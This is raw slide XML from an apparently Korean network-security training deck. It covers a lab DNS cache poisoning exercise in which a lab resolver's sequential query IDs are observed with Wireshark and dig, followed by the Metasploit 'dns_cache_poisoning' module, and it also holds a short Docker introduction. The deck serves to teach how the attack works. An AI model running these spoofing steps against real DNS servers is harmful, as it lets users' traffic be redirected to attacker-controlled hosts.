              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service iptables restart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6.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>되는 패킷을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># tail –f /var/log/message </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a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Net/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 11. DNS Spoofing</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>인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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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패킷 캡처 도구인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행 및 패킷 캡처 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Application -&gt; 09 – Sniffing &amp; Spoofing -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>선택</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eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버가 보내는 쿼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 확인하기 위하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 일부 호스트의 주소 조회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> www.navy.ac.kr 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># dig @10.10.1.14 www.navy.ac.kr </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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>※ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>오염시킬 호스트에 미리 접속하면</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실제 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>IP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>주소가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>서버에 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>캐싱되므로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격을 성공시킬 수 없음</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"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/Environ/Docker</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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t>Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Linux® </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>컨테이너를 만들고 사용할 수 있도록 하는 컨테이너화 기술</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>컨테이너는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>레벨의 가상화로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>프로세스를 격리시켜 동작하는 방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>성능향상</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>뛰어난 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>이식성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Scale Out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="140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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 캡처한 패킷들 중 로컬 네트워크의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(10.0.2.6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 보낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(queries)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의 패킷</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 DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xb8a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>는 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>※ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>칼리 리눅스의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>서버 주소를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10.10.1.14(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>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rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>로 설정하면 웹 브라우저를 통해서도 확인 가능</a:t>
                      </a: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 www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의 패킷</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의의 소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>※ www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0xb8bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버가 보내는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 순차적으로 증가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>캐시 오염 공격을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>캐시 오염 공격 모듈 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> &gt; use auxiliary/spoof/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>1980~90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>BIND4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>BIND8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>은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r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>ID </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>BIND9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>ID </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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공격 모듈의 옵션 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
